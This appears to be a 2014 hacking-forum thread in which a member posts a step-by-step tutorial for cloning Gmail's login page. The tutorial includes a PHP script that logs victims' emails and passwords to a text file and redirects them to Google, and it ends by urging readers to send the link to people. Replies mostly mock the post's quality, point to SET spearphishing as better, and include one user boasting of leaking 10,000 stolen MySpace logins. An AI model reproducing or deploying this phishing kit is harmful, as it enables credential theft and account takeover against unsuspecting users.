Author Topic: [TUTORIAL] Creating A Very Basic Phishing Page  (Read 4311 times)

0 Members and 1 Guest are viewing this topic.

Offline Jackk

  • NULL
  • Posts: 3
  • Cookies: -4
    • View Profile
[TUTORIAL] Creating A Very Basic Phishing Page
« on: June 30, 2014, 02:17:31 am »
Hello EvilZone members!
This is my first post, and my first tutorial!  8)


First I would like to point out that phishing is a very basic level of hacking and should really only be used for experience in the language you are learning, in this case I'm using php.


But to get straight to the point here are step by step instructions on how to phish.


1) sign up for a free subdomain here:
Code: [Select]
http://www.000webhost.com I would recommend this site for anything you are doing related to websites because there isn't any advertising, it's free, and it allows you to use whatever language you want to.


2) go to the website that you want to use for phishing.  In this case I'm using Gmail.


3) copy the source html code from the site and paste it into a new file in your publiuc_html folder in 000webhost, name the file whatever you'd like, (perferably index.html.)


4) hit "CTRL" and "F" on your keyboard and look up "<form" delete all of the results AND the attributes inside the form tag. If you are new to html by that i mean delete everything between "<form" and the next ">".


5) hit "CTRL" and "F"[/size][/font][/size][size=78%] again but this time look up "type="submit"" you should only get one result which will be a button. The button will more than likely be in the "input" tag.  Directly after the input tag type "</form>" then scroll up until you find the input tag with the id username.  Directly before that type "<form action="write.php" method="get">"

6) save your file and then make a new one.  This one will be called write.php.

7) copy and paste the following code into your write.php:
Code: (php) [Select]
<?php
$email 
$_GET['Email'];
$passwd $_GET['Passwd'];
$fo fopen("fisher.txt""a");
$fw fwrite($fo"$email$passwd\n");
fclose($fo);
header('Location: https://accounts.google.com/ServiceLoginAuth');
?>

8 ) make a new file called fisher.txt

9) send people links to your official looking login page and watch the passwords roll in!
« Last Edit: June 30, 2014, 07:34:14 am by Kulverstukas »

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: [TUTORIAL] Phishing
« Reply #1 on: June 30, 2014, 02:22:50 am »
Go the fuck away. Your bullshit post last time got removed and so will this. Go crawl in a hole and die skidfuck
« Last Edit: June 30, 2014, 02:23:04 am by DeepCopy »
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Jackk

  • NULL
  • Posts: 3
  • Cookies: -4
    • View Profile
Re: [TUTORIAL] Phishing
« Reply #2 on: June 30, 2014, 03:11:02 am »
why will this be removed?

Offline Jackk

  • NULL
  • Posts: 3
  • Cookies: -4
    • View Profile
Re: [TUTORIAL] Creating A Very Basic Phishing Page
« Reply #3 on: June 30, 2014, 03:18:59 am »
Ok I'm fine with that.. but why would this be removed?
« Last Edit: June 30, 2014, 03:26:10 am by Jackk »

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: [TUTORIAL] Creating A Very Basic Phishing Page
« Reply #4 on: June 30, 2014, 03:43:34 am »
1. Shitty formatting
2. Crappy knowledge
3. Didn't even mention permissions would need to be changed on fisher.txt so it can be written to
4. You already posted your 000webhost referral link saying that they allow phishers when they don't and will be removed and account suspended once they find out about it
5. Shitty BBCode all over the place
6. This method of phishing is old and outdated
7. SET - spearphishing
« Last Edit: June 30, 2014, 03:46:02 am by DeepCopy »
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: [TUTORIAL] Creating A Very Basic Phishing Page
« Reply #5 on: June 30, 2014, 03:59:12 am »
True but spearphishing with the ease of SET or not is still better.

Don't get me wrong I used phishing a long time ago with MySpace, in fact I dumped 10,000 logins on EZ, however with a little help from a few lines of code that put an invisible link over their entire page that went to my phisher ironically hosted on 000webhost which then got reported and suspended. But times have changed. Phishing is still possible but hosts find it easier, people notice it more, browsers detect it and a lot of sites warn when following a link
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: [TUTORIAL] Creating A Very Basic Phishing Page
« Reply #6 on: June 30, 2014, 04:37:42 am »
Ok, so in my personal opinion a basic phishing tutorial isn't really up to snuff for EZ, but, since the local moderator wants to keep it I'm not going to just override that. I do remember posting some really basic shit when I first joined and when someone gave me shit I said;
"This post isn't for you then fuck off."

So, we'll keep it. I'm locking this though if much more flaming happens.
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python